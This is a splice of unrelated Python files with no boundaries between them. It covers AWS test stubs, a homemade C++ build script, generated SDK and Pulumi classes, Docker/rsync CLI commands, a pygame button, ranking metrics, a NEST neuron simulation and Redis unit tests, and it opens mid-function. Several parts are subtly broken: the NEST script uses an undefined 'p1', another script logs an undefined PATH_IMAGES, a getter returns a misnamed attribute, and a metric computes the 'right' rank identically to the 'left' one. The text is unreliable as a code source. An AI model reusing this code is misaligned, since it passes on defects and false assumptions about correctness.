error_code=error_code) def stub_describe_policy(self, policy, error_code=None): expected_parameters = {'PolicyId': policy['id']} response = {'Policy': { 'PolicySummary': self._make_policy_summary(policy), 'Content': json.dumps(policy['content']) }} self._stub_bifurcator( 'describe_policy', expected_parameters, response, error_code=error_code) def stub_attach_policy(self, policy_id, target_id, error_code=None): expected_parameters = {'PolicyId': policy_id, 'TargetId': target_id} self._stub_bifurcator( 'attach_policy', expected_parameters, error_code=error_code) def stub_detach_policy(self, policy_id, target_id, error_code=None): expected_parameters = {'PolicyId': policy_id, 'TargetId': target_id} self._stub_bifurcator( 'detach_policy', expected_parameters, error_code=error_code) def stub_delete_policy(self, policy_id, error_code=None): expected_parameters = {'PolicyId': policy_id} self._stub_bifurcator( 'delete_policy', expected_parameters, error_code=error_code)
#!/usr/bin/python3 import pathlib import os import subprocess import yaml FILENAME = 'xmake.yml' CONFIG = '.git' OUTDIR = '.out' def repo_abs_path(): d = pathlib.Path.cwd() while not (d / CONFIG).exists(): d = d.parent return d def curr_rel_path(): d = pathlib.Path.cwd() return d.relative_to(repo_abs_path()) def prefix_to_rel_path(prefix): return prefix.relative_to(pathlib.PurePath('//')) def prefix_to_abs_path(prefix): return repo_abs_path() / prefix_to_rel_path(prefix) def rel_path_to_prefix(rel_path): return pathlib.PurePath('//') / rel_path def curr_prefix(): return rel_path_to_prefix(curr_rel_path()) def prefix_to_abs_out_name(prefix): abs_path = prefix_to_abs_path(prefix) name = abs_path.name dep_dir = abs_path.parent return dep_dir / OUTDIR / name def cmd_run(command): print(' '.join(command)) subprocess.run(command) def do_cpp(name, props): CC = 'clang++' AR = 'ar' LINKER = 'ld' OPT = '-O3' G = '-g0' STD = '-std=c++20' INCLUDE = '-I' + str(repo_abs_path()) PTHREAD = '-pthread' if 'main' not in props: props['main'] = False if 'hdrs' not in props: props['hdrs'] = list() if 'srcs' not in props: props['srcs'] = list() srcs = props['srcs'] hdrs = props['hdrs'] main = props['main'] deps = props['deps'] rule_dir = prefix_to_abs_path(name).parent target_out = rule_dir / OUTDIR target_out.mkdir(exist_ok=True) # The objects we'll link against in this rule. This includes the source # objects and the lib files we depend on. objects = list() # Compile the sources. for src in srcs: src_path = rule_dir / src dot_o = (target_out / src).with_suffix('.o') cmd_run([ CC, OPT, # G, STD, INCLUDE, '-c', str(src_path), '-o', str(dot_o) ]) objects.append(str(dot_o)) # Get the compiled dependencies. They should have been compiled outside this # function. for dep in deps: dot_a = prefix_to_abs_out_name(dep).with_suffix('.a') objects.append(str(dot_a)) # Link everything or archive everything. out_name = prefix_to_abs_out_name(name) if main: cmd_run([CC, PTHREAD, '-o', str(out_name)] + objects) else: cmd_run([AR, 'rcsuUPT', str(out_name.with_suffix('.a'))] + objects) def load_prefix(prefix): print('[Loading]', prefix) prop_dict = dict() rel_path = prefix_to_rel_path(prefix) abs_path = repo_abs_path() / rel_path with (abs_path / FILENAME).open() as f: rules = yaml.safe_load(f) for name, props in rules.items(): canonical_name = prefix / name # Canonicalize deps. deps = props['deps'] if 'deps' in props else list() dep_paths = (pathlib.PurePath(dep) for dep in deps) canonical_deps = (dep_path if dep_path.is_absolute() else prefix / dep_path for dep_path in dep_paths) props['deps'] = set(canonical_deps) prop_dict[canonical_name] = props return prop_dict loaded_prefixes = set() prop_dict = load_prefix(curr_prefix()) loaded_prefixes.add(curr_prefix()) targets = set() size = 0 while size != len(prop_dict): size = len(prop_dict) new_dict = dict() for target, props in prop_dict.items(): deps = props['deps'] for dep in deps: prefix = dep.parent if prefix not in loaded_prefixes: new_dict.update(load_prefix(prefix)) loaded_prefixes.add(prefix) targets.add(target) prop_dict.update(new_dict) done_targets = set() # Nothing fancy. Keep looping over the rules to see which ones have all # dependencies done. Note names are canonical names already. while targets != done_targets: for target, props in prop_dict.items(): deps = props['deps'] if all(dep in done_targets for dep in deps) and target not in done_targets: print("[Doing]", target) do_cpp(target, prop_dict[target]) done_targets.add(target)
# coding: utf-8 """ Isilon SDK Isilon SDK - Language bindings for the OneFS API # noqa: E501 OpenAPI spec version: 9 Contact: sdk@isilon.com Generated by: https://github.com/swagger-api/swagger-codegen.git """ import pprint import re # noqa: F401 import six class HdfsInotifySettingsSettings(object): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'enabled': 'bool', 'maximum_delay': 'int', 'retention': 'int' } attribute_map = { 'enabled': 'enabled', 'maximum_delay': 'maximum_delay', 'retention': 'retention' } def __init__(self, enabled=None, maximum_delay=None, retention=None): # noqa: E501 """HdfsInotifySettingsSettings - a model defined in Swagger""" # noqa: E501 self._enabled = None self._maximum_delay = None self._retention = None self.discriminator = None if enabled is not None: self.enabled = enabled if maximum_delay is not None: self.maximum_delay = maximum_delay if retention is not None: self.retention = retention @property def enabled(self): """Gets the enabled of this HdfsInotifySettingsSettings. # noqa: E501 Enable or disable the collection of edits over HDFS and access to the edits via HDFS INotify stream. # noqa: E501 :return: The enabled of this HdfsInotifySettingsSettings. # noqa: E501 :rtype: bool """ return self._enabled @enabled.setter def enabled(self, enabled): """Sets the enabled of this HdfsInotifySettingsSettings. Enable or disable the collection of edits over HDFS and access to the edits via HDFS INotify stream. # noqa: E501 :param enabled: The enabled of this HdfsInotifySettingsSettings. # noqa: E501 :type: bool """ self._enabled = enabled @property def maximum_delay(self): """Gets the maximum_delay of this HdfsInotifySettingsSettings. # noqa: E501 The maximum duration in seconds until an edit event is reported in INotify. The default is 60, which amounts to a minute. # noqa: E501 :return: The maximum_delay of this HdfsInotifySettingsSettings. # noqa: E501 :rtype: int """ return self._maximum_delay @maximum_delay.setter def maximum_delay(self, maximum_delay): """Sets the maximum_delay of this HdfsInotifySettingsSettings. The maximum duration in seconds until an edit event is reported in INotify. The default is 60, which amounts to a minute. # noqa: E501 :param maximum_delay: The maximum_delay of this HdfsInotifySettingsSettings. # noqa: E501 :type: int """ if maximum_delay is not None and maximum_delay > 2147483647: # noqa: E501 raise ValueError("Invalid value for `maximum_delay`, must be a value less than or equal to `2147483647`") # noqa: E501 if maximum_delay is not None and maximum_delay < 0: # noqa: E501 raise ValueError("Invalid value for `maximum_delay`, must be a value greater than or equal to `0`") # noqa: E501 self._maximum_delay = maximum_delay @property def retention(self): """Gets the retention of this HdfsInotifySettingsSettings. # noqa: E501 The minimum amount of time in seconds the edits will be retained. The default is 172800, which amounts to 48hr. # noqa: E501 :return: The retention of this HdfsInotifySettingsSettings. # noqa: E501 :rtype: int """ return self._retention @retention.setter def retention(self, retention): """Sets the retention of this HdfsInotifySettingsSettings. The minimum amount of time in seconds the edits will be retained. 
The default is 172800, which amounts to 48hr. # noqa: E501 :param retention: The retention of this HdfsInotifySettingsSettings. # noqa: E501 :type: int """ if retention is not None and retention > 2147483647: # noqa: E501 raise ValueError("Invalid value for `retention`, must be a value less than or equal to `2147483647`") # noqa: E501 if retention is not None and retention < 0: # noqa: E501 raise ValueError("Invalid value for `retention`, must be a value greater than or equal to `0`") # noqa: E501 self._retention = retention def to_dict(self): """Returns the model properties as a dict""" result = {} for attr, _ in six.iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, HdfsInotifySettingsSettings): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """Returns true if both objects are not equal""" return not self == other
# system import logging import subprocess # local from ..config import LoadedConfig from ..executable import Executable from ..projects import Projects from ..rootkit import Rootkit, prefix_path_mnt from ..subcommand import SubCommand class ConfCopyCommand(SubCommand): """kiwi conf-copy""" def __init__(self): super().__init__( 'conf-copy', action="Syncing all configs for", add_parser=False, description="Synchronize all config files to target directory" ) def _run_instance(self, runner, args): conf_dirs = [ project.conf_dir_name() for project in Projects.from_dir().filter_enabled() if project.has_configs() ] if conf_dirs: # add target directory conf_dirs.append(LoadedConfig.get()['runtime:storage']) logging.info(f"Sync directories: {conf_dirs}") Rootkit('rsync').run([ 'rsync', '-rpt', '--delete', *prefix_path_mnt(conf_dirs) ], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) return True def _find_net(net_name): ps = Executable('docker').run([ 'network', 'ls', '--filter', f"name={net_name}", '--format', '{{.Name}}' ], stdout=subprocess.PIPE) net_found = str(ps.stdout, 'utf-8').strip() return net_found == net_name class NetUpCommand(SubCommand): """kiwi net-up""" def __init__(self): super().__init__( 'net-up', action="Creating the local network hub for", add_parser=False, description="Create the local network hub for this instance" ) def _run_instance(self, runner, args): config = LoadedConfig.get() net_name = config['network:name'] net_cidr = config['network:cidr'] if _find_net(net_name): logging.info(f"Network '{net_name}' already exists") return True try: Executable('docker').run([ 'network', 'create', '--driver', 'bridge', '--internal', '--subnet', net_cidr, net_name ], check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) logging.info(f"Network '{net_name}' created") except subprocess.CalledProcessError: logging.error(f"Error creating network '{net_name}'") return False return True
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import json import warnings import pulumi import pulumi.runtime from typing import Union from .. import utilities, tables class Variable(pulumi.CustomResource): name: pulumi.Output[str] """ The name of the variable to manage. Note that variable names can be hierarchical using slashes (e.g. "prod-variables/hostname"). """ parent: pulumi.Output[str] """ The name of the RuntimeConfig resource containing this variable. """ project: pulumi.Output[str] """ The ID of the project in which the resource belongs. If it is not provided, the provider project is used. """ text: pulumi.Output[str] update_time: pulumi.Output[str] """ (Computed) The timestamp in RFC3339 UTC "Zulu" format, accurate to nanoseconds, representing when the variable was last updated. Example: "2016-10-09T12:33:37.578138407Z". """ value: pulumi.Output[str] def __init__(__self__, resource_name, opts=None, name=None, parent=None, project=None, text=None, value=None, __props__=None, __name__=None, __opts__=None): """ Manages a RuntimeConfig variable in Google Cloud. For more information, see the [official documentation](https://cloud.google.com/deployment-manager/runtime-configurator/), or the [JSON API](https://cloud.google.com/deployment-manager/runtime-configurator/reference/rest/). :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] name: The name of the variable to manage. Note that variable names can be hierarchical using slashes (e.g. "prod-variables/hostname"). :param pulumi.Input[str] parent: The name of the RuntimeConfig resource containing this variable. :param pulumi.Input[str] project: The ID of the project in which the resource belongs. If it is not provided, the provider project is used. > This content is derived from https://github.com/terraform-providers/terraform-provider-google/blob/master/website/docs/r/runtimeconfig_variable.html.markdown. """ if __name__ is not None: warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning) resource_name = __name__ if __opts__ is not None: warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning) opts = __opts__ if opts is None: opts = pulumi.ResourceOptions() if not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') if opts.version is None: opts.version = utilities.get_version() if opts.id is None: if __props__ is not None: raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource') __props__ = dict() __props__['name'] = name if parent is None: raise TypeError("Missing required property 'parent'") __props__['parent'] = parent __props__['project'] = project __props__['text'] = text __props__['value'] = value __props__['update_time'] = None super(Variable, __self__).__init__( 'gcp:runtimeconfig/variable:Variable', resource_name, __props__, opts) @staticmethod def get(resource_name, id, opts=None, name=None, parent=None, project=None, text=None, update_time=None, value=None): """ Get an existing Variable resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param str id: The unique provider ID of the resource to lookup. 
:param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] name: The name of the variable to manage. Note that variable names can be hierarchical using slashes (e.g. "prod-variables/hostname"). :param pulumi.Input[str] parent: The name of the RuntimeConfig resource containing this variable. :param pulumi.Input[str] project: The ID of the project in which the resource belongs. If it is not provided, the provider project is used. :param pulumi.Input[str] update_time: (Computed) The timestamp in RFC3339 UTC "Zulu" format, accurate to nanoseconds, representing when the variable was last updated. Example: "2016-10-09T12:33:37.578138407Z". > This content is derived from https://github.com/terraform-providers/terraform-provider-google/blob/master/website/docs/r/runtimeconfig_variable.html.markdown. """ opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)) __props__ = dict() __props__["name"] = name __props__["parent"] = parent __props__["project"] = project __props__["text"] = text __props__["update_time"] = update_time __props__["value"] = value return Variable(resource_name, opts=opts, __props__=__props__) def translate_output_property(self, prop): return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop def translate_input_property(self, prop): return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
#!/usr/bin/env python import os.path import logging import locales _ = locales._ from gui_image_opener import toAbsPath, getBackground PATH_BACKGROUNDS = toAbsPath('backgrounds/gif') pattern_fn = 'irka3_{fld}{scheme}.fld' TITLE_BORDER = _("BG Border") TITLE_TOUCHED = _("BG Touched") TITLE_UNTOUCHED = _("BG Untouched") CATEGORY_BORDER = list() CATEGORY_TOUCHED = list() CATEGORY_UNTOUCHED = list() def getBackgrounds(): l = os.listdir(PATH_BACKGROUNDS) for fn in l: if fn[0] == '.': logging.debug(_("ignoring hidden file {fn} in {path}").format(fn=fn, path=PATH_IMAGES)) continue fn = os.path.splitext(fn)[0] + ".fld" yield fn CATEGORY_ALL = list(getBackgrounds()) CATEGORY_ALL.sort() for bg in CATEGORY_ALL: short = getBackground.getShortName(bg) if "1" in short: CATEGORY_BORDER.append(bg) elif "2" in short: CATEGORY_UNTOUCHED.append(bg) elif "3" in short: CATEGORY_TOUCHED.append(bg) else: logging.error("background with invalid name can not be categorized: %r" % (bg,)) categories = ( #(_("Background"), CATEGORY_ALL), (TITLE_BORDER, CATEGORY_BORDER), (TITLE_UNTOUCHED, CATEGORY_UNTOUCHED), (TITLE_TOUCHED, CATEGORY_TOUCHED), ) if __name__=='__main__': print(CATEGORY_ALL)
x = float(input("enter number:"))
sroot = x ** 0.5  # square root of the entered number
print(sroot)
import pygame class Button(pygame.sprite.Sprite): def __init__( self, id_: int, image_path: str, rect: pygame.Rect, color: pygame.Color, highlight_color: pygame.Color, text: str, font_size: int, text_color: pygame.Color, highlight_text_color: pygame.Color = None ): """Initialize the button Args: id_ (int): the id of the button rect (pygame.Rect): the rect of the button color (pygame.Color): the color of the button highlight_color (pygame.Color): the color of the button when hovered text (str): the text of the button text_color (pygame.Color): the color of the text """ super().__init__() self.id = id_ self.rect = pygame.Rect(rect) # Set the colors self.color = color self.highlight_color = highlight_color # Create the image self.image = pygame.image.load(image_path).convert_alpha() self.image = pygame.transform.scale(self.image, (self.rect.width, self.rect.height)) # Set the text self.text = text self.text_color = text_color self.highlight_text_color = highlight_text_color # Set the font # self.font = pygame.font.SysFont("Bauhaus 93", font_size) self.font = pygame.font.SysFont("Impact", font_size) # Set the text position self.text_pos = (self.rect.centerx - self.font.size(self.text)[0] / 2, self.rect.centery - self.font.size(self.text)[1] / 2) @property def hover(self) -> bool: """Check if the mouse is hovering over the button Returns: bool: True if the mouse is hovering over the button, False otherwise """ return self.rect.collidepoint(pygame.mouse.get_pos()) @property def pressed(self) -> bool: """Check if the button is pressed Returns: bool: True if the button is pressed, False otherwise """ return pygame.mouse.get_pressed()[0] and self.hover def draw(self, surface: pygame.Surface): """Draw the button Args: surface (pygame.Surface): the surface to draw the button on """ # Copy the image image = self.image.copy() text_color = self.text_color # If the mouse is hovering over the button, change the color if self.hover: image.fill(self.highlight_color, special_flags=pygame.BLEND_RGBA_MULT) if self.highlight_text_color is not None: text_color = self.highlight_text_color else: image.fill(self.color, special_flags=pygame.BLEND_RGBA_MULT) # Draw the image and text surface.blit(image, self.rect) surface.blit(self.font.render(self.text, True, text_color), self.text_pos)
from sklearn.metrics import accuracy_score, precision_recall_fscore_support import numpy as np import torch def tc_compute_metrics(pred): labels = pred.label_ids preds = pred.predictions.argmax(-1) precision, recall, f1, _ = precision_recall_fscore_support(labels, preds, average='binary') simple_accuracy = (preds == labels).mean() acc = accuracy_score(labels, preds) return { 'accuracy': acc, 'f1': f1, 'precision': precision, 'recall': recall, 'simple_accuracy': simple_accuracy } def rp_compute_metrics(pred): labels = pred.label_ids preds = pred.predictions.argmax(-1) simple_accuracy = (preds == labels).mean() ranks = [] hits = [] for i in range(10): hits.append([]) for i, pred in enumerate(pred.predictions): rel_values = torch.tensor(pred) _, argsort1 = torch.sort(rel_values, descending=True) argsort1 = argsort1.cpu().numpy() rank = np.where(argsort1 == labels[i])[0][0] ranks.append(rank + 1) for hits_level in range(10): if rank <= hits_level: hits[hits_level].append(1.0) else: hits[hits_level].append(0.0) metrics_with_values = { 'raw_mean_rank': np.mean(ranks), 'simple_accuracy': simple_accuracy } for i in [0, 2, 9]: metrics_with_values[f'raw_hits @{i + 1}'] = np.mean(hits[i]) return metrics_with_values def htp_compute_metrics(pred): labels = pred.label_ids preds = pred.predictions.argmax(-1) simple_accuracy = (preds == labels).mean() ranks = [] ranks_left = [] ranks_right = [] hits_left = [] hits_right = [] hits = [] top_ten_hit_count = 0 for i in range(10): hits_left.append([]) hits_right.append([]) hits.append([]) for triple_id in range(0, len(labels), 41): preds = pred.predictions[triple_id:triple_id+41, 1] rel_values = torch.tensor(preds) _, argsort1 = torch.sort(rel_values, descending=True) argsort1 = argsort1.cpu().numpy() rank1 = np.where(argsort1 == 0)[0][0] ranks.append(rank1 + 1) ranks_left.append(rank1 + 1) if rank1 < 10: top_ten_hit_count += 1 rel_values = torch.tensor(preds) _, argsort1 = torch.sort(rel_values, descending=True) argsort1 = argsort1.cpu().numpy() rank2 = np.where(argsort1 == 0)[0][0] ranks.append(rank2 + 1) ranks_right.append(rank2 + 1) if rank2 < 10: top_ten_hit_count += 1 for hits_level in range(10): if rank1 <= hits_level: hits[hits_level].append(1.0) hits_left[hits_level].append(1.0) else: hits[hits_level].append(0.0) hits_left[hits_level].append(0.0) if rank2 <= hits_level: hits[hits_level].append(1.0) hits_right[hits_level].append(1.0) else: hits[hits_level].append(0.0) hits_right[hits_level].append(0.0) metrics_with_values = { 'simple_accuracy': simple_accuracy, } for i in [0, 2, 9]: metrics_with_values[f'hits_left_@{i+1}'] = np.mean(hits_left[i]) metrics_with_values[f'hits_right_@{i + 1}'] = np.mean(hits_right[i]) metrics_with_values[f'hits_@{i + 1}'] = np.mean(hits[i]) metrics_with_values[f'mean_rank_left'] = np.mean(ranks_left) metrics_with_values[f'mean_rank_right'] = np.mean(ranks_right) metrics_with_values[f'mean_rank'] = np.mean(ranks) metrics_with_values['mean_reciprocal_rank_left'] = np.mean(1. / np.array(ranks_left)) metrics_with_values['mean_reciprocal_rank_right'] = np.mean(1. / np.array(ranks_right)) metrics_with_values['mean_reciprocal_rank'] = np.mean(1. / np.array(ranks)) return metrics_with_values
from .gathering_env import GatheringEnv import torch class SingleAgentGatheringEnv(GatheringEnv): def __init__(self, cfg): assert cfg.no_agents == 1, "Config not configured for 1 agent." super(SingleAgentGatheringEnv, self).__init__(cfg) def reset(self): self._record_ep = False self.ep_cnt += 1 self.step_cnt = 0 observation = self._reset() self.prev_observation = observation return observation[0] def restart_game(self, record_episode=False): obs = self.reset() reward = 0 self._record_ep = record_episode if record_episode: self.recorded_data = self.init_ep_record_data() return obs, reward, False def get_recorded_data(self): return self.record_data def step(self, action): observation, reward, done = self._step(torch.LongTensor([action])) self.step_cnt += 1 if self.step_cnt >= self.max_steps: done = torch.ones(self.no_agents).byte() if self._record_ep: self.record_step_data(observation, reward, done) self.prev_observation = observation return observation[0], reward[0].item(), done[0].item(), {}
#!/usr/bin/env python import sys sys.path.append('/opt/lib/python2.7/site-packages/') import math import numpy as np import pylab import nest import nest.raster_plot import nest.topology as tp nest.ResetKernel() nest.SetKernelStatus({'local_num_threads': 8}) a = { "tau_m" : 20.0, "V_th" : -55.0, "E_L" : -65.0, "t_ref" : 2.0, "V_reset" : -75.0, "C_m" : 250.0, "V_m" : 0.0, } alpha = { "tau_m" : 20.0, "V_th" : -55.0, "E_L" : -65.0, "t_ref" : 2.0, "V_reset" : -75.0, "C_m" : 250.0, "V_m" : 0.0, } beta = { "tau_m" : 20.0, "V_th" : -55.0, "E_L" : -65.0, "t_ref" : 2.0, "V_reset" : -75.0, "C_m" : 250.0, "V_m" : 0.0, } gamma = { "tau_m" : 6.0, "V_th" : -55.0, "E_L" : -65.0, "t_ref" : 2.0, "V_reset" : -75.0, "C_m" : 250.0, "V_m" : 0.0, } # The population sizes # The total population of layer 4 of area W layer_4_population = 1000 # ratio of number of excitatory to inhibitory neurons (alpha/beta) alpha_beta_ratio = 0.5 # A dict of all the populations population_sizes = [ 2*layer_4_population, # area A alpha_beta_ratio*layer_4_population, # alpha excitatory neurons of layer 4 of area W (1-alpha_beta_ratio)*layer_4_population, # beta inhibitory neurons of layer 4 of area W 0.03*layer_4_population # gamma excitatory neurons of area W ] # An array of all the areas population_properties = [a, alpha, beta, gamma] simulation_time = 1000 radius = float(int(math.sqrt(layer_4_population)/10)*10) # Create the neuronal populations noises = [] # todo spike_detectors = [] layers = [] for ctr in xrange(len(population_properties)): nest.CopyModel('iaf_psc_alpha', 'neuron'+str(ctr), population_properties[ctr]) pop = math.sqrt(population_sizes[ctr]) l = tp.CreateLayer({ 'rows': int(pop), 'columns': int(pop), 'elements': 'neuron'+str(ctr), 'extent': [radius, radius], 'edge_wrap': True }) layers.append(l) # Create the input source (how? - connect mic?) 
# For list of all synapse types, execute nest.Models('synapses') # nest.CopyModel('stdp_synapse', 'excitatory', {'mu_plus': 1.0, 'mu_minus':1.0}) # nest.CopyModel('stdp_synapse', 'inhibitory', {'mu_plus': -1.0, 'mu_minus':-1.0}) nest.CopyModel('static_synapse', 'excitatory') nest.CopyModel('static_synapse', 'inhibitory') # Connection topologies tonotopic_excitatory = { 'connection_type': 'divergent', # 'mask': { # 'doughnut': { # 'inner_radius': radius/10, # 'outer_radius': radius # } # # 'circular': {'radius': radius} # }, 'weights': { # 'gaussian': { # 'p_center': 1.0, # 'sigma': 10.0 # } 'uniform': { 'min': 0.0, 'max': 1.0 } }, 'allow_oversized_mask': True, # 'kernel': { # 'gaussian': { # 'p_center': 1.0, # 'sigma': 1.0 # } # }, 'synapse_model': 'excitatory' } tonotopic_excitatory_noSTDP = { 'connection_type': 'divergent', 'mask': { 'circular': { 'radius': radius/2 } }, 'allow_oversized_mask': True, 'kernel': { 'gaussian': { 'p_center': 1.0, 'sigma': 1.0 } } } excitatory = { 'connection_type': 'divergent', 'synapse_model': 'excitatory', 'weights': { 'uniform': { 'min': 0.0, 'max': 0.1 } } } excitatory_layerW = { 'connection_type': 'divergent', 'synapse_model': 'excitatory', 'weights': { 'uniform': { 'min': 0.0, 'max': 1.0 } } } excitatory_topological = { 'connection_type': 'divergent', 'synapse_model': 'excitatory', 'weights': { 'uniform': { 'min': 0.0, 'max': 5.0 } }, 'kernel': { 'gaussian': { 'p_center': 1.0, 'sigma': radius/2 } } } inhibitory_layerW = { 'connection_type': 'divergent', 'synapse_model': 'inhibitory', 'weights': { 'uniform': { 'min': -5.0, 'max': 0.0 } } } inhibitory_delay_layerW = { 'connection_type': 'divergent', 'synapse_model': 'inhibitory', 'weights': { 'uniform': { 'min': -5.0, 'max': 0.0 } } } inhibitory = { 'connection_type': 'divergent', 'synapse_model': 'inhibitory', 'weights': { 'uniform': { 'min': -0.1, 'max': 0.0 } } } inhibitory_topolocical = { 'connection_type': 'divergent', 'synapse_model': 'inhibitory', 'weights': { 'uniform': { 'min': -0.1, 'max': 0.0 } }, 'kernel': { 'gaussian': { 'p_center': 1.0, 'sigma': radius/2 } } } # Area A to layer 4 of area W connectionso tp.ConnectLayers(layers[0], layers[1], excitatory_topological) tp.ConnectLayers(layers[0], layers[2], excitatory_topological) # Layer 4 Area W interconnections tp.ConnectLayers(layers[2], layers[1], inhibitory_layerW) tp.ConnectLayers(layers[1], layers[2], excitatory_layerW) tp.ConnectLayers(layers[1], layers[1], excitatory_layerW) # tp.ConnectLayers(layers[2], layers[2], inhibitory) # Layer 4 to layer 5/6 of Area W connections tp.ConnectLayers(layers[1], layers[3], excitatory_layerW) tp.ConnectLayers(layers[1], layers[3], inhibitory_layerW) # Provide inputs nest.CopyModel('ac_generator', 'ac', {'amplitude': 200.0, 'frequency': 20.0}) nest.CopyModel('ac_generator', 'ac2', {'amplitude': 50.0, 'frequency': 3.0}) nest.CopyModel('dc_generator', 'dc', {'amplitude': 100.0}) ac_rows = 1 ac = tp.CreateLayer({ 'rows': ac_rows, 'columns': ac_rows, 'elements': ['ac', 'ac2'], 'extent': [radius, radius] }) nest.CopyModel('noise_generator', 'noises', {'mean': 0.0, 'std': 200.0}) noise = tp.CreateLayer({ 'rows': ac_rows, 'columns': ac_rows, 'elements': 'noises', 'extent': [radius, radius] }) # Create a raster plotter spike_rows = int(math.sqrt(population_sizes[len(population_sizes)-1])) spikes = tp.CreateLayer({ 'rows': spike_rows, 'columns': spike_rows, 'elements': 'spike_detector', 'extent': [radius, radius] }) # tp.PlotLayer(layers[2]) tp.ConnectLayers(ac, layers[0], {'connection_type': 'divergent'}) # 
tp.ConnectLayers(ac, layers[2], {'connection_type': 'divergent'}) tp.ConnectLayers(noise, layers[0], {'connection_type': 'divergent'}) # tp.ConnectLayers(noise, layers[2], {'connection_type': 'divergent'}) tp.ConnectLayers(layers[0], spikes, {'connection_type': 'convergent'}) tp.ConnectLayers(layers[1], spikes, {'connection_type': 'convergent'}) tp.ConnectLayers(layers[2], spikes, {'connection_type': 'convergent'}) tp.ConnectLayers(layers[3], spikes, {'connection_type': 'convergent'}) nest.Simulate(simulation_time) spike_id = spikes[0]+1 spike_ids = tuple([x for x in xrange(spike_id, spike_id+(spike_rows*spike_rows))]) nest.raster_plot.from_device(spike_ids) pylab.show() n1 = p1._e[0] + 1 n1id = tuple([x for x in xrange(n1, int(n1+(p1._extent*p1._extent)))]) n1c = nest.GetConnections(n1id) w1 = nest.GetStatus(n1c, 'weight') pylab.hist(w1, bins=100) pylab.show() n2 = p1._i[0] + 1 n2id = tuple([x for x in xrange(n2, int(n2+(p1._extent*p1._extent)))]) n2c = nest.GetConnections(n2id) w2 = nest.GetStatus(n2c, 'weight') pylab.hist(w2, bins=100) pylab.show()
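# A quick sanity check of the population arithmetic used above (plain Python,
# no NEST needed).  With layer_4_population = 1000 and alpha_beta_ratio = 0.5
# the four populations come out as 2000 (area A), 500 (alpha), 500 (beta) and
# 30 (gamma); each is laid out on an int(sqrt(N)) x int(sqrt(N)) grid, so e.g.
# the gamma population actually instantiates 5 x 5 = 25 nodes rather than 30.
import math

layer_4_population = 1000
alpha_beta_ratio = 0.5
population_sizes = [
    2 * layer_4_population,
    alpha_beta_ratio * layer_4_population,
    (1 - alpha_beta_ratio) * layer_4_population,
    0.03 * layer_4_population,
]
radius = float(int(math.sqrt(layer_4_population) / 10) * 10)  # 30.0
for n in population_sizes:
    side = int(math.sqrt(n))
    print(n, "->", side, "x", side, "=", side * side, "nodes")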
from collections import Counter


class Solution:
    def maxNumberOfBalloons(self, text: str) -> int:
        # Each copy of "balloon" needs one 'b', 'a', 'n' and two 'l', 'o'.
        d = Counter(text)
        return min(d['b'], d['a'], d['l'] // 2, d['o'] // 2, d['n'])
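# Quick check of the counting logic above; the inputs are the usual
# "maximum number of balloons" examples and are easy to verify by hand.
if __name__ == "__main__":
    assert Solution().maxNumberOfBalloons("nlaebolko") == 1
    assert Solution().maxNumberOfBalloons("loonbalxballpoon") == 2
    assert Solution().maxNumberOfBalloons("leetcode") == 0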
""" table object reference count """ a="nyc" b="nyc" print(a) a=123 print(a) print(b) b=456 print(b) c='nyc' d=c print(c==d) print(d is c)
from unittest import mock, main, TestCase

from api.handlers import HttpHandlers


class TestHttpHandlers(TestCase):
    "test class for HttpHandlers"

    def test_valid_visits_1(self):
        "successfully call the endpoint, key has not yet been set up in Redis"
        m_redis_client = mock.MagicMock()
        m_redis_client.get.return_value = None
        m_redis_client.mset.return_value = None
        HttpHandlers.redis_client = m_redis_client
        result_body, result_code = HttpHandlers.visits()
        self.assertIn("visits", result_body)
        self.assertEqual(result_body["visits"], 1)
        self.assertEqual(result_code, HttpHandlers.HTTP_STATUS_OK)

    def test_valid_visits_2(self):
        "successfully call the endpoint, key has already been set up in Redis"
        m_redis_client = mock.MagicMock()
        m_redis_client.get.return_value = b"2"
        m_redis_client.mset.return_value = None
        HttpHandlers.redis_client = m_redis_client
        result_body, result_code = HttpHandlers.visits()
        self.assertIn("visits", result_body)
        self.assertEqual(result_body["visits"], 3)
        self.assertEqual(result_code, HttpHandlers.HTTP_STATUS_OK)

    @mock.patch('api.handlers.logging.error', return_value=None)
    def test_invalid_visits_1(self, m_logerr):
        "error when attempting to get the key from Redis"
        m_redis_client = mock.MagicMock()
        m_redis_client.get.side_effect = RuntimeError("Test Redis Exception")
        HttpHandlers.redis_client = m_redis_client
        result_body, result_code = HttpHandlers.visits()
        self.assertIn("error", result_body)
        self.assertEqual(result_code, HttpHandlers.HTTP_STATUS_INTERNAL_SERVER_ERROR)

    @mock.patch('api.handlers.logging.error', return_value=None)
    def test_invalid_visits_2(self, m_logerr):
        "error when the Redis client has not been configured"
        HttpHandlers.redis_client = None
        result_body, result_code = HttpHandlers.visits()
        self.assertIn("error", result_body)
